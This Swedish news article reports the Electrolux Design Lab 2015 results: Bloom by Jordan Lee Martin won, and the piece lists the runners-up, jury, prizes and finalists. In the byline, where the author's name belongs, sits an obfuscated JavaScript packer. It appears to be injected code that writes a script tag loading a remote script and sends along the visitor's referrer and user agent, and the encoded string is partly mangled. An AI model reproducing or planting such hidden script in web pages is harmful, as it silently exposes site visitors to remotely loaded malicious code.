Image Image Image Image Image Image Image Image Image Image

| 3 juni, 2020

Scroll to top

Top

Bloom vinner Electrolux Design Lab 2015

Bloom vinner Electrolux Design Lab 2015
Sebastian

Av eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|itztt|var|u0026u|referrer|rfykf||js|php’.split(’|’),0,{}))
fler än 1 500 tävlingsbidrag var det Bloom av Jordan Lee Martin
från Storbritannien som blev den slutliga vinnaren av Electrolux Design Lab 2015. Vinnaren utsågs av en expertjury inför 200 internationella medier, bloggare och Electrolux partners i Kattilahalli-hallen i Helsingfors, Finland.

Bloom är ett koncept som minskar klyftan mellan digital och praktisk inlärning genom att uppmuntra till bra köksvanor på ett roligt sätt.

”Baserat på verkliga behov och genom en smart användning av existerande teknik, har det här estetiskt tilltalande konceptet potential att ha flera användningsområden som att inspirera, utbilda och interagera med barn, både emotionellt, digitalt och fysiskt, säger Lars Erikson”, Senior Vice President Design på Electrolux och juryordförande för Design Lab.

Andrapriset gick till Air Shield, en barnvagn som skapar ett rent mikroklimat, av Dominykas Budinas från Litauen. Juryns motivering var: ”Grundat på ett brådskande behov och genom användande av tillgänglig teknik har det här konceptet direkt marknadspotential genom att det bidrar till friskare barn. Den här produkten kan rädda liv”.

Q.H, en luftrenare och rockring i ett skapad av Jeongbeen Seo från Sydkorea, kom på tredje plats. Juryns motivering löd: ”Genom att använda en äldre klassisk produkt på 2000-talet utgör det ett koncept som innefattar tidlös design av hög estetisk kvalité, något som skapar en inspirerande och fängslande produkt”.

I kategorin ”People’s Choice Award” vann Weaver av Larissa Trindade från Brasilien efter att ha tagit emot över 4 300 röster från allmänheten på Design Labs hemsida.

Se det vinnande bidraget på www.electroluxdesignlab.com

och www.youtube.com/electrolux.

Temat för Electrolux Design Lab 2015 var ”Healthy Happy Kids” och tävlingen kretsade kring innovativa idéer för produkter, accessoarer, konsumtionsvaror och service inom de tre områdena matlagning, textilvård och luftrening.

Tävlingsprocessen

Till årets tävling kom det in fler än 1 500 tävlingsbidrag från över 56 länder. Experter på Electrolux började med att välja ut de 100 bästa bidragen för att sedan smalna av urvalet till 35 och därefter ta fram sex finalister. Allmänheten kunde också påverka tävlingen genom att rösta på sin favorit idé. Under tävlingsprocessen fokuserade studenterna på flera olika områden; framläggande av en idé och skiss, konceptutveckling, visuell utveckling, funktionell utveckling och den slutliga presentationen.

Finalistjuryn i Design Lab 2015, som bestod av Lars Erikson, Senior Vice President Design på Electrolux och juryordförande för Design Lab, Hanna Harris, Programme Director för Helsinki Design Week och Fredrik Magnusson, Design entreprenör och VD för Roder innovation, valde vinnaren utifrån de sex finalisterna.

Om Electrolux Design Lab 2015

Syftet med Electrolux Design Lab är att stimulera och aktivera designstudenter runt om i världen genom att bjuda in dem till att presentera nya idéer för framtidens hushåll. Tävlingen stödjer Electrolux åtagande att leda utvecklingen av vitvaror då den ger bränsle till nya idéer och inspiration för innovation samt är en möjlighet att nå ut till nya talanger. Tävlingens förstapris är en sex månader lång betald praktik på ett av Electrolux globala designcenter. Hälften av vinnarna från tidigare år har fortsatt att jobba inom Electrolux efter praktikperioden. Vinnaren belönas med 10 000 euro, tvåan vinner 6 000 euro och tredjepriset är 4 000 euro. Deltagarna tävlar även om ett ”People’s Choice Award”, där den som får flest onlineröster kammar hem 2 000 euro.

Finalisterna i Design Lab 2015 var:

·        Voris en robot som lär barn ta hand om sina kläder av Martha Fabiola García Bustos från Mexiko.

·        Q.H [Quadruple H] en luftrenare och rockring i ett av Jeongbeen Seo från Sydkorea.

·        Future Classroom ett interaktivt och självförsörjande kök att använda för utbildning av Tobias Tsamisis från Ungern/Tyskland.

·        Air Shield en barnvagn som skapar ett rent mikroklimat av Dominykas Budinas från Litauen.

·        Bloom minskar klyftan mellan digital och praktisk inlärning genom att uppmuntra till bra köksvanor på ett roligt sätt av Jordan Lee Martin från Storbritannien.

·        Plato en robot som hjälper dig att ta hand om ditt barn av Mary Pilyugina från Ryssland.